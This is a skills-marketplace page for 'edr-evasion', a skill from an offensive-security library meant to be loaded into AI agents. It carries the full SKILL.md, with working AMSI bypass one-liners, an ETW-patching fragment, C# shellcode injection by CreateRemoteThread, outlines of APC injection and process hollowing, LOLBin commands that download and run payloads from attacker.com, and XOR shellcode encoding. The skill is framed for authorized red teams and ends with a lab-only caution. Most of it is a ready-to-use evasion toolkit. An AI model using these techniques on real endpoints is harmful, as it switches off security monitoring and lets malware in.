agentsclimarketplace

Edr evasion

Skill sunilgentyala/OmniRed/skills/infrastructure/edr-evasion

OmniRed: Multi-AI offensive security skills library for Claude, ChatGPT, Gemini & Microsoft Copilot — with unique MCP, LLM-pipeline, and AI-native attack categories. By Sunil Gentyala, Independent Researcher.

Install
npx -y skills add sunilgentyala/OmniRed --skill edr-evasion

Assembled from the repository path, not quoted from the project. Check it against their README if it does not work.

2 things to look at

  • no licenseNo license file was found in the repository. Code published without one is not open source by default, so using it at work is a question for whoever answers licensing questions where you are.
  • 0 stars0 stars. Stars are a popularity signal and not a quality one, but at this level it is likely that nobody has read this closely except its author, and you would be relying on your own review.

What its author says it does

Copied from the file, not written here

EDR/AV evasion methodology for authorized red team operations. Covers process injection, AMSI bypass, ETW patching, LOLBins, reflective loading, and obfuscation techniques for testing endpoint detection coverage.

The file declares its own license as Apache-2.0. That is the author’s claim about this one file, and it is not the same thing as the license GitHub reports for the repository, which is listed with the other numbers below.

SKILL.md

4.7 KB, as published. Nobody here has run it

EDR Evasion

Attack Surface

Endpoint Detection and Response (EDR) products use: kernel callbacks, userland API hooks, ETW (Event Tracing for Windows), behavioral analytics, static signatures, and memory scanning. Each layer is independently bypassable.

Methodology

Phase 1 — EDR identification

# Identify running EDR agents
Get-Process | Where-Object {
    $_.Name -match 'sentinel|crowdstrike|defender|carbon|cylance|sophos|symantec|mcafee|trend|bitdefender'
}

# Check loaded drivers (kernel-level EDR components)
Get-WmiObject Win32_SystemDriver | Where-Object {$_.Name -match 'csagent|sentinel|cb|windefend'}

# Check userland hooks (EDR hooks ntdll.dll exports)
# Use PE-sieve or moneta to detect hooked functions

Phase 2 — AMSI bypass

# Classic: patch AmsiScanBuffer return value (AmsiInitFailed)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# COM-based bypass
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').GetValue($null),0x80070057)

# Memory patch (requires SeDebugPrivilege)
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$b=$a.GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static')
$c=$b.GetValue($null)
[Runtime.InteropServices.Marshal]::WriteByte($c, 0x258, 0)

Phase 3 — ETW patching

# Patch EtwEventWrite to prevent telemetry
$patch = [Byte[]] (0xc3)  # ret
$addr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
    (Get-ProcAddress ntdll.dll EtwEventWrite), [Type[]] @([IntPtr])
)

Phase 4 — Process injection techniques

Classic CreateRemoteThread:

IntPtr procHandle = OpenProcess(PROCESS_ALL_ACCESS, false, targetPid);
IntPtr allocMem = VirtualAllocEx(procHandle, IntPtr.Zero, shellcodeSize,
    MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(procHandle, allocMem, shellcode, shellcodeSize, out _);
CreateRemoteThread(procHandle, IntPtr.Zero, 0, allocMem, IntPtr.Zero, 0, out _);

Early Bird (APC injection — evades CreateRemoteThread detection):

// Create suspended process, queue APC, resume
CreateProcess(..., CREATE_SUSPENDED, ...);
VirtualAllocEx → WriteProcessMemory → QueueUserAPC → ResumeThread

Thread hijacking (no new thread created):

SuspendThread → GetThreadContext → modify RIP to shellcode → SetThreadContext → ResumeThread

Process hollowing:

CreateProcess (suspended) → ZwUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext (new EP) → ResumeThread

Phase 5 — LOLBins (Living Off the Land)

# Execute payload via signed Microsoft binaries
mshta.exe http://attacker.com/payload.hta
regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
bitsadmin.exe /transfer job /download /priority normal http://attacker.com/payload.exe %temp%\payload.exe

Phase 6 — Shellcode obfuscation

# XOR encode shellcode
key = 0x42
encoded = bytes([b ^ key for b in shellcode])

# Fragmentation — split across multiple variables
chunk1 = shellcode[:len(shellcode)//2]
chunk2 = shellcode[len(shellcode)//2:]
# Reconstruct in-memory before execution

Tools

MITRE ATT&CK Mapping

  • T1055 — Process Injection
  • T1562.001 — Impair Defenses: Disable or Modify Tools
  • T1218 — System Binary Proxy Execution (LOLBins)
  • T1027 — Obfuscated Files or Information

Notes

EDR evasion research must be conducted in isolated lab environments. Using these techniques against production endpoints without explicit authorization constitutes unauthorized computer access. Test against a dedicated EDR test tenant or VM.

Keep looking

Skills are one crate of 328,083. Ordering is by how many stacks a row turns up in, so the top of any crate is what has actually been picked rather than what has the most stars.